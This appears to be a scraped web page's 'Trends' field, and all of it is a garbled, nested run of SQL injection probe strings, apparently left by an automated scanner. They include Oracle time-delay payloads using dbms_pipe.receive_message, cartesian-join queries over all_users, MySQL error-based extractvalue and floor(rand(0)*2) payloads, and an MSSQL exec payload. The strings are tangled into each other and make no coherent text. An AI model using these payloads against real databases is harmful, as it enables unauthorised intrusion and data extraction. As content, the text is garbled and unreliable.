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Trends: ejx and 6844=(select count();select dbms_pipe.receive_message(chr(104)||chr(90)||chr(112)||chr(77),10) from dual--) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--, ejx and 6844=(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--, ejx and 6844=(select count()) and 9951=9951-- ltbq) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--, ejx and 6844=(select count( procedure analyse(extractvalue(6427,concat(0x5c,0x717a787071,(select (case when (6427=6427) then 1 else 0 end)),0x7178707871)),1)-- aaje) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--, ejx and 6844=(select 2589 from(select count(*),concat(0x717a787071,(select (elt(2589=2589,1))),0x7178707871,floor(rand(0)*2))x from information_schema.plugins group by x)a)) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--, ejx and 6844=(select count() procedure analyse(extractvalue(6427,concat(0x5c,0x717a787071,(select (case when (6427=6427) then 1 else 0 end)),0x7178707871)),1) and (7867=7867) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--, ejx and 6844=(select count( order by 1-- obvc) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--, ejx and 6844=(select count(%';declare ebza nvarchar(4000);set ebza=(select 'qzxpq' (select (case when (1474=1474) then '1' else '0' end)) 'qxpxq');exec ebza--) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--, ejx and 6844=(select count() and case when 5417=2773 then 5417 else json(char(80,73,76,120)) end and (4199=4199) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--, ejx and 6844=(select count(') order by 2234-- imva) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--,